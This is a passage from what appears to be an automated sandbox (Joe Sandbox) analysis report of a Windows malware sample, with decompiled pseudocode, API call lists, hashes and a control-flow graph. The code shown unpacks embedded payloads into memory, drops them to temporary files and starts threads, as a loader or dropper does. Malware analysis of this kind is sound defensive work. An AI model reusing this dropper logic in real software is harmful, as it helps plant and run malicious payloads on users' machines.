                                                                                                                                                                                                                                                                          							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                          							_push( &_v20);
                                                                                                                                                                                                                                                                          							_t64 = _v12;
                                                                                                                                                                                                                                                                          							_push(_t64); // executed
                                                                                                                                                                                                                                                                          							L0400B1DA(); // executed
                                                                                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                          										E04007B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                          										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                          										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                          										_v12 =  *_v12;
                                                                                                                                                                                                                                                                          										_v8 = 1;
                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *_a12 = _v24;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v32 = _v16;
                                                                                                                                                                                                                                                                          							E040097C0(_v32);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04009f76
                                                                                                                                                                                                                                                                          0x04009f81
                                                                                                                                                                                                                                                                          0x04009f87
                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                          0x04009f94
                                                                                                                                                                                                                                                                          0x04009fad
                                                                                                                                                                                                                                                                          0x04009fb2
                                                                                                                                                                                                                                                                          0x04009fb5
                                                                                                                                                                                                                                                                          0x04009fbb
                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                          0x04009fcb
                                                                                                                                                                                                                                                                          0x04009fe0
                                                                                                                                                                                                                                                                          0x04009fe6
                                                                                                                                                                                                                                                                          0x04009fe7
                                                                                                                                                                                                                                                                          0x04009fea
                                                                                                                                                                                                                                                                          0x04009feb
                                                                                                                                                                                                                                                                          0x04009ff2
                                                                                                                                                                                                                                                                          0x04009ff4
                                                                                                                                                                                                                                                                          0x04009ffb
                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                          0x0400a034
                                                                                                                                                                                                                                                                          0x0400a039
                                                                                                                                                                                                                                                                          0x0400a048
                                                                                                                                                                                                                                                                          0x0400a050
                                                                                                                                                                                                                                                                          0x0400a053
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a05e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                          0x0400a06b
                                                                                                                                                                                                                                                                          0x0400a072
                                                                                                                                                                                                                                                                          0x0400a077
                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                          0x0400a080

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                          • Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                          • Instruction ID: 97f005e152f21f2c2f7fd10924b0caa403664ba6d1ad8a9a516f1bf18f754b30
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B931FBB5E00209EFEB04CF98C494AEEB7B5EF48308F10C169E909A7390D735AA45CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 436 40062b0-40062c4 437 40062ca-40062ce 436->437 438 4006c4e 436->438 437->438 440 40062d4-40062e0 437->440 439 4006c51-4006c54 438->439 440->438 441 40062e6-40062ed 440->441 441->438 442 40062f3-4006314 441->442 444 400631a-400631e 442->444 445 400642e-4006453 442->445 447 4006320-400633a 444->447 448 4006343-4006363 444->448 449 4006459-400645d 445->449 450 4006c2f-4006c36 445->450 447->448 451 400633c-400633e 447->451 452 4006429 448->452 453 4006369-4006375 448->453 454 4006482-40064a2 449->454 455 400645f-4006479 449->455 456 4006c44 450->456 457 4006c38-4006c42 450->457 451->439 452->445 453->452 458 400637b-4006384 453->458 459 40065f3-40065fc 454->459 460 40064a8-40064b4 454->460 455->454 461 400647b-400647d 455->461 456->438 457->438 458->452 462 400638a-4006393 458->462 464 4006603-400660f 459->464 465 40065fe 459->465 460->459 463 40064ba-400654c GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 460->463 461->439 462->452 466 4006399-40063a2 462->466 463->459 496 4006552-4006586 WriteFile 463->496 470 4006615-4006621 464->470 471 4006bdd-4006be9 464->471 465->464 467 4006410-4006424 call 4001ee0 466->467 468 40063a4-40063ca VirtualAlloc 466->468 481 4006427 467->481 472 40063cc-40063e4 call 4006260 468->472 473 400640e 468->473 470->471 478 4006627-4006640 call 4007250 470->478 474 4006c18-4006c24 471->474 475 4006beb-4006bf7 471->475 493 40063e6-40063fa call 4001ee0 472->493 494 40063fd-4006408 VirtualFree 472->494 473->481 482 4006c26 474->482 483 4006c2a 474->483 475->474 480 4006bf9-4006c16 call 400a360 475->480 491 4006642 478->491 492 4006647-400664e 478->492 480->483 481->445 482->483 483->450 491->492 497 4006752-400675b 492->497 498 4006654-4006674 VirtualAlloc 492->498 493->494 494->473 500 4006588-4006591 496->500 501 40065dd-40065e4 496->501 505 4006761-4006788 497->505 506 40069ba-4006a49 GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 497->506 498->497 502 400667a-4006747 call 4007b70 call 40097a0 CreateThread CloseHandle 498->502 500->501 507 4006593-40065c7 CloseHandle call 4006c60 call 4001e60 500->507 501->459 504 40065e6-40065ed CloseHandle 501->504 502->497 504->459 510 4006858-4006864 call 4002070 505->510 511 400678e-40067c0 VirtualAlloc 505->511 535 4006bd6 506->535 536 4006a4f-4006a75 506->536 533 40065d8 call 4006cf0 507->533 534 40065c9-40065d0 call 40074a0 ExitProcess 507->534 522 400686a-4006871 510->522 516 4006856 511->516 517 40067c6-40067e7 call 4006260 511->517 516->522 531 4006842-4006850 VirtualFree 517->531 532 40067e9-4006807 call 4002070 517->532 529 40069b0 522->529 530 4006877-400687e 522->530 529->506 537 4006880-4006891 call 40073c0 530->537 538 4006894-400689d 530->538 531->516 532->531 558 4006809-400683a VirtualAlloc call 4007b70 532->558 533->501 535->471 544 4006a7b-4006aad VirtualAlloc 536->544 545 4006b1e-4006b3c WriteFile 536->545 537->538 540 40068a3-40068c8 call 40097a0 538->540 541 400698a-4006993 538->541 564 40068e9-400690d VirtualAlloc 540->564 565 40068ca-40068e7 540->565 554 4006995-40069a6 call 4002510 541->554 555 40069a9 541->555 552 4006b1c 544->552 553 4006aaf-4006ad0 call 4006260 544->553 548 4006b42-4006b49 545->548 556 4006bc9-4006bd0 CloseHandle 548->556 557 4006b4b-4006b57 548->557 552->548 572 4006ad2-4006b02 WriteFile 553->572 573 4006b08-4006b16 VirtualFree 553->573 554->555 555->529 556->535 557->556 562 4006b59-4006b82 CloseHandle call 4001e60 557->562 569 400683f 558->569 577 4006b84-4006b8b 562->577 578 4006bc7 562->578 570 4006934-400693d 564->570 571 400690f-4006931 call 4007b70 564->571 565->570 569->531 570->541 576 400693f-4006984 CreateThread CloseHandle 570->576 571->570 572->573 573->552 576->541 580 4006ba1-4006baa 577->580 581 4006b8d-4006b9e call 40073c0 577->581 578->535 583 4006bc0 580->583 584 4006bac-4006bbd call 4002510 580->584 581->580 583->578 584->583
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040062B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                          				void _v60;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                          				int _v608;
                                                                                                                                                                                                                                                                          				long _v612;
                                                                                                                                                                                                                                                                          				signed int _v616;
                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                          				void* _v624;
                                                                                                                                                                                                                                                                          				void* _v628;
                                                                                                                                                                                                                                                                          				int _v632;
                                                                                                                                                                                                                                                                          				signed int _v636;
                                                                                                                                                                                                                                                                          				long _v640;
                                                                                                                                                                                                                                                                          				void* _v644;
                                                                                                                                                                                                                                                                          				void* _v648;
                                                                                                                                                                                                                                                                          				void* _v652;
                                                                                                                                                                                                                                                                          				char _v916;
                                                                                                                                                                                                                                                                          				void* _v920;
                                                                                                                                                                                                                                                                          				char _v932;
                                                                                                                                                                                                                                                                          				char _v1196;
                                                                                                                                                                                                                                                                          				long _v1200;
                                                                                                                                                                                                                                                                          				int _v1204;
                                                                                                                                                                                                                                                                          				long _v1208;
                                                                                                                                                                                                                                                                          				void* _v1212;
                                                                                                                                                                                                                                                                          				long _v1216;
                                                                                                                                                                                                                                                                          				signed int _v1220;
                                                                                                                                                                                                                                                                          				void* _v1224;
                                                                                                                                                                                                                                                                          				void* _v1228;
                                                                                                                                                                                                                                                                          				intOrPtr _t317;
                                                                                                                                                                                                                                                                          				signed char _t321;
                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                          				signed int _t340;
                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                          				signed int _t355;
                                                                                                                                                                                                                                                                          				void* _t361;
                                                                                                                                                                                                                                                                          				void* _t368;
                                                                                                                                                                                                                                                                          				void* _t378;
                                                                                                                                                                                                                                                                          				void* _t381;
                                                                                                                                                                                                                                                                          				signed int _t383;
                                                                                                                                                                                                                                                                          				void* _t386;
                                                                                                                                                                                                                                                                          				void* _t393;
                                                                                                                                                                                                                                                                          				int _t415;
                                                                                                                                                                                                                                                                          				signed int _t421;
                                                                                                                                                                                                                                                                          				signed int _t428;
                                                                                                                                                                                                                                                                          				signed char _t433;
                                                                                                                                                                                                                                                                          				void* _t439;
                                                                                                                                                                                                                                                                          				signed char _t442;
                                                                                                                                                                                                                                                                          				void* _t448;
                                                                                                                                                                                                                                                                          				signed int _t452;
                                                                                                                                                                                                                                                                          				intOrPtr _t455;
                                                                                                                                                                                                                                                                          				void* _t465;
                                                                                                                                                                                                                                                                          				void* _t472;
                                                                                                                                                                                                                                                                          				void* _t473;
                                                                                                                                                                                                                                                                          				void* _t508;
                                                                                                                                                                                                                                                                          				void* _t509;
                                                                                                                                                                                                                                                                          				void* _t528;
                                                                                                                                                                                                                                                                          				void* _t529;
                                                                                                                                                                                                                                                                          				void* _t539;
                                                                                                                                                                                                                                                                          				void* _t549;
                                                                                                                                                                                                                                                                          				void* _t550;
                                                                                                                                                                                                                                                                          				void* _t551;
                                                                                                                                                                                                                                                                          				void* _t563;
                                                                                                                                                                                                                                                                          				void* _t598;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L99:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 =  *_a4;
                                                                                                                                                                                                                                                                          					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                          							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                          								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                          								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									L22:
                                                                                                                                                                                                                                                                          									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                          									__eflags = _t428;
                                                                                                                                                                                                                                                                          									_v24 = _t428;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t508 = _v20;
                                                                                                                                                                                                                                                                          								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                          								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *0x401435d & 0x000000ff;
                                                                                                                                                                                                                                                                          								if(( *0x401435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t509 = _v20;
                                                                                                                                                                                                                                                                          								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          									_t433 = E04001EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                          									L21:
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          								__eflags = _v40;
                                                                                                                                                                                                                                                                          								if(_v40 == 0) {
                                                                                                                                                                                                                                                                          									L19:
                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t439 = E04006260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                          								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                          								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                          									_t442 = E04001EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v36 =  *_v20;
                                                                                                                                                                                                                                                                          								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                          								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v13 = 0;
                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                          							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__eflags = _v48;
                                                                                                                                                                                                                                                                          							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                          								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                          								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e274; // 0x2
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									L39:
                                                                                                                                                                                                                                                                          									_t448 = _v20;
                                                                                                                                                                                                                                                                          									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                          									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                          											L90:
                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e278; // 0x3
                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                          												L93:
                                                                                                                                                                                                                                                                          												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e27c; // 0x4
                                                                                                                                                                                                                                                                          												if(__eflags == 0) {
                                                                                                                                                                                                                                                                          													_v13 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												L95:
                                                                                                                                                                                                                                                                          												L24:
                                                                                                                                                                                                                                                                          												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                          												__eflags = _t452;
                                                                                                                                                                                                                                                                          												_v48 = _t452;
                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e288; // 0x2
                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                          												goto L93;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_t317 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                          											_t455 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          											E0400A360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                          											goto L95;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                          											goto L90;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_t321 = E04007250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                          										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          											_t528 = _v20;
                                                                                                                                                                                                                                                                          											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                          											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                          												L48:
                                                                                                                                                                                                                                                                          												_t529 = _v20;
                                                                                                                                                                                                                                                                          												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                          												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                          													E04007D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                          													E04009730( &_v932, 4);
                                                                                                                                                                                                                                                                          													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                          													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                          													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                          													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                          														L89:
                                                                                                                                                                                                                                                                          														goto L24;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_v1200 = 0;
                                                                                                                                                                                                                                                                          													_v1204 = 0;
                                                                                                                                                                                                                                                                          													_v1208 = _v56;
                                                                                                                                                                                                                                                                          													_t333 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                          														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                          														__eflags = _v1212;
                                                                                                                                                                                                                                                                          														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                          															_t349 = E04006260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                          															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                          															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                          																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                          																_v1208 = _v1216;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													__eflags = _v1204;
                                                                                                                                                                                                                                                                          													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                          														L88:
                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                          														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                          															goto L88;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                          														_t340 = E04001E60( &_v916);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          														_v1220 = _t340;
                                                                                                                                                                                                                                                                          														__eflags = _v1220;
                                                                                                                                                                                                                                                                          														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                          															_t465 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                          															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                          																E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_t539 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                          															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          																E04002510(_v1220, 0x400e290);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_v8 = 1;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													goto L89;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												_v636 = 0;
                                                                                                                                                                                                                                                                          												_v632 = 0;
                                                                                                                                                                                                                                                                          												_v640 = 0;
                                                                                                                                                                                                                                                                          												_t472 = _v20;
                                                                                                                                                                                                                                                                          												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          													_t355 = E04002070(_v52);
                                                                                                                                                                                                                                                                          													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          													_v636 = _t355;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                          													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          													_v644 = _t378;
                                                                                                                                                                                                                                                                          													__eflags = _v644;
                                                                                                                                                                                                                                                                          													if(_v644 != 0) {
                                                                                                                                                                                                                                                                          														_t381 = E04006260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                          														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                          														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                          															_t383 = E04002070(_v644); // executed
                                                                                                                                                                                                                                                                          															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          															_v636 = _t383;
                                                                                                                                                                                                                                                                          															_t563 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                          															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          																_v632 = _t386;
                                                                                                                                                                                                                                                                          																E04007B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												__eflags = _v636;
                                                                                                                                                                                                                                                                          												if(_v636 != 0) {
                                                                                                                                                                                                                                                                          													_t473 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                          													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                          														E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_t549 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                          													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          														_t361 = E040097A0(0x10);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          														_v1228 = _t361;
                                                                                                                                                                                                                                                                          														_v648 = _v1228;
                                                                                                                                                                                                                                                                          														_t551 = _v20;
                                                                                                                                                                                                                                                                          														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
